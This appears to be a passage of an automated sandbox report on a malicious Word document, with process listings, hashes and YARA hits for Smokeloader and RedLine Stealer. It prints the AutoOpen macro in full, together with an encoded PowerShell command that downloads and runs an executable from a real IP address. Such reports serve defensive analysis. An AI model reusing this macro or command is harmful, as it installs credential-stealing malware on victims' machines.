        Imagebase:0x4a300000
        File size:345'088 bytes
        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:4
        Start time:14:15:03
        Start date:23/05/2024
        Path:C:\Windows\System32\timeout.exe
        Wow64 process (32bit):false
        Commandline:timeout 3
        Imagebase:0xff720000
        File size:33'280 bytes
        MD5 hash:68A0A50CCAD87E1EE1944410A96D066C
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        General

        Target ID:5
        Start time:14:15:06
        Start date:23/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Imagebase:0x13f700000
        File size:443'392 bytes
        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        General

        Target ID:6
        Start time:14:15:08
        Start date:23/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=
        Imagebase:0x13f700000
        File size:443'392 bytes
        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        General

        Target ID:7
        Start time:14:15:11
        Start date:23/05/2024
        Path:C:\Users\user\AppData\Local\Temp\svchost.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
        Imagebase:0x400000
        File size:184'320 bytes
        MD5 hash:92C57DD80B764A028749520017D44E76
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
        Antivirus matches:
        • Detection: 100%, Avira
        • Detection: 92%, ReversingLabs
        Reputation:low
        Has exited:true

        Disassembly

        Code Analysis

        Call Graph

        • Entrypoint
        • Decryption Function
        • Executed
        • Not Executed
        • Show Help
        callgraph 2 AutoOpen Shell:1,vbHide:1

        Module: NewMacros

        Declaration
        LineContent
        1

        Attribute VB_Name = "NewMacros"

        Executed Functions

        Subroutine

        AutoOpenAPIs: 4, Strings: 1, Number of lines: 8, Relevance: 16.008

        APIsMeta Information

        ScreenUpdating

        Shell

        		Shell("cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;",0) -> 1408

        vbHide

        ScreenUpdating

        StringsDecrypted Strings
        "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
        LineInstructionMeta Information
        2

        Sub AutoOpen()

        3

        Application.ScreenUpdating = False

        ScreenUpdating

        executed
        4

        Dim Program as Integer

        5

        Dim cmdStr as String

        6

        cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"

        7

        Program = Shell(cmdStr, vbHide)

        Shell("cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;",0) -> 1408

        vbHide

        executed
        8

        Application.ScreenUpdating = True

        ScreenUpdating

        9

        End Sub

        Module: ThisDocument

        Declaration
        LineContent
        1

        Attribute VB_Name = "ThisDocument"

        2

        Attribute VB_Base = "1Normal.ThisDocument"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = True

        7

        Attribute VB_TemplateDerived = True

        8

        Attribute VB_Customizable = True

        Reset < >

          Executed Functions

          Function 000007FE898B1449 Relevance: .5, Instructions: 503COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000006.00000002.360908253.000007FE898B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_7fe898b0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 433b252fa4d4071099d931c644e148126b45ce5871a1036bd3c655d66cb04956
          • Instruction ID: cc8c962d0d8350a656312e0646fc743e626004bd1a1d36180d886ae77fa483b8
          • Opcode Fuzzy Hash: 433b252fa4d4071099d931c644e148126b45ce5871a1036bd3c655d66cb04956
          • Instruction Fuzzy Hash: B7E1E321A1DBCA0FE75B933868652B97FE1EF47354F1C00EAD48ECB1A3DA186C558352

          Non-executed Functions

          Function 000007FE898B00DD Relevance: 9.9, Strings: 7, Instructions: 1121COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.360908253.000007FE898B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_7fe898b0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 6s$(U|$(U|$(U|$(U|$(U|$(U|
          • API String ID: 0-3889620081
          • Opcode ID: 371c0a7af5ff1cb626d12ac0f65d029e016f2165299e635a6646ae7b8d7c7732
          • Instruction ID: cd25ecbb880e541b3ff211196812c795ac6e19dc0286c82bd6344a31c4197883
          • Opcode Fuzzy Hash: 371c0a7af5ff1cb626d12ac0f65d029e016f2165299e635a6646ae7b8d7c7732
          • Instruction Fuzzy Hash: C062162090DBCA4FE70A9B3858152B97FE1EF47254F1901EFD48EDB1A3D618AC56C392

          Execution Graph

          Execution Coverage:3.7%
          Dynamic/Decrypted Code Coverage:86.4%
          Signature Coverage:36.4%
          Total number of Nodes:44
          Total number of Limit Nodes:2
          execution_graph 1594 220001 1595 220005 1594->1595 1600 22092b GetPEB 1595->1600 1597 220030 1602 22003c 1597->1602 1601 220972 1600->1601 1601->1597 1603 220049 1602->1603 1604 220e0f 3 API calls 1603->1604 1605 220223 1604->1605 1606 220d90 GetPEB 1605->1606 1607 220238 1606->1607 1608 220005 1609 22092b GetPEB 1608->1609 1610 220030 1609->1610 1611 22003c 4 API calls 1610->1611 1612 220038 1611->1612 1613 4015f7 1616 40512a 1613->1616 1615 4015fc 1615->1615 1617 40515c GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1616->1617 1618 40514f 1616->1618 1619 405153 1617->1619 1618->1617 1618->1619 1619->1615 1566 22003c 1567 220049 1566->1567 1572 220e0f SetErrorMode SetErrorMode 1567->1572 1571 220238 1573 220e26 ExitProcess 1572->1573 1574 220223 1572->1574 1575 220d90 1574->1575 1576 220dad 1575->1576 1577 220dbb GetPEB 1576->1577 1578 220db6 1576->1578 1577->1578 1578->1571 1579 244b76b 1580 244b77a 1579->1580 1583 244bf0b 1580->1583 1584 244bf26 1583->1584 1585 244bf2f CreateToolhelp32Snapshot 1584->1585 1586 244bf4b Module32First 1584->1586 1585->1584 1585->1586 1587 244b783 1586->1587 1588 244bf5a 1586->1588 1590 244bbca 1588->1590 1591 244bbf5 1590->1591 1592 244bc06 VirtualAlloc 1591->1592 1593 244bc3e 1591->1593 1592->1593 1593->1593

          Executed Functions

          Function 0244BF0B Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
          Download Yara Rule

          Control-flow Graph

          APIs
          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0244BF33
          • Module32First.KERNEL32(00000000,00000224), ref: 0244BF53
          Memory Dump Source
          • Source File: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, Offset: 02449000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_2449000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: CreateFirstModule32SnapshotToolhelp32
          • String ID:
          • API String ID: 3833638111-0
          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
          • Instruction ID: f12e05898196025065ec2b066dc87b57f234087bf17806e5740922aa3c967e1c
          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
          • Instruction Fuzzy Hash: EEF062319007116BE7206BB59C8DB6FB6E8EF49628F10066AE64BD15C1DF70E8454A61
          Function 00220E0F Relevance: 4.5, APIs: 3, Instructions: 15COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 220e0f-220e24 SetErrorMode * 2 1 220e26-220e28 ExitProcess 0->1 2 220e2b-220e2c 0->2
          APIs
          • SetErrorMode.KERNELBASE(00000400,?,?,00220223,?,?), ref: 00220E19
          • SetErrorMode.KERNELBASE(00000000,?,?,00220223,?,?), ref: 00220E1E
          • ExitProcess.KERNELBASE(00000000,?,00220223,?,?), ref: 00220E28
          Memory Dump Source
          • Source File: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_220000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ErrorMode$ExitProcess
          • String ID:
          • API String ID: 1912810149-0
          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
          • Instruction ID: f23233c31a1da53253dfcacb42dea6b2ddc5ffc9e64891eed547aff6082d6eb8
          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
          • Instruction Fuzzy Hash: 1DD0123114512877D7002ED4DC09BCD7B1CDF09B62F008411FB0DD9081C7B0994046E5
          Function 0244BBCA Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 105 244bbca-244bc04 call 244bedd 108 244bc06-244bc39 VirtualAlloc call 244bc57 105->108 109 244bc52 105->109 111 244bc3e-244bc50 108->111 109->109 111->109
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0244BC1B
          Memory Dump Source
          • Source File: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, Offset: 02449000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_2449000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
          • Instruction ID: aaac125e19b07a5b0236b3e106b70ed789d6e94e40265925881dd15e593e6f23
          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
          • Instruction Fuzzy Hash: 69112A79A00208EFDB01DF99C985E99BBF5EF08350F1580A5FA489B361D771EA90DF80

          Non-executed Functions

          Function 0022092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 281 22092b-220970 GetPEB 282 220972-220978 281->282 283 22097a-22098a call 220d35 282->283 284 22098c-22098e 282->284 283->284 289 220992-220994 283->289 284->282 286 220990 284->286 288 220996-220998 286->288 290 220a3b-220a3e 288->290 289->288 291 22099d-2209d3 289->291 292 2209dc-2209ee call 220d0c 291->292 295 2209f0-220a3a 292->295 296 2209d5-2209d8 292->296 295->290 296->292
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_220000_svchost.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: .$GetProcAddress.$l
          • API String ID: 0-2784972518
          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
          • Instruction ID: a1368690eb1bf0129f82696e878bee6ebb4af28ed6ea8f51c4a445d236bbdf64
          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
          • Instruction Fuzzy Hash: 9E319DB2910219DFDB10CF88D880AADBBF5FF08724F14404AD401A7312C3B0EA94CFA4
          Function 0244B7E8 Relevance: .1, Instructions: 61COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, Offset: 02449000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_2449000_svchost.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
          • Instruction ID: 6fa107e39a8497ee33ec2484bda18a7e7bae0fd7a1a857188168d73d04b3a7e8
          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
          • Instruction Fuzzy Hash: 69118E72740101AFEB44DF56DCC0EA673EAEB98224B19806AED04CB351EA75E842CB60
          Function 00220D90 Relevance: .0, Instructions: 43COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_220000_svchost.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
          • Instruction ID: f41f70d4de0e9ea93270b67a425b979dda617f3a5c679f025cc64dfca50b111f
          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
          • Instruction Fuzzy Hash: 0B012B766116109FDF21CFA0E884FAA33F9FB86305F0544B4D906D7243E770A841CB80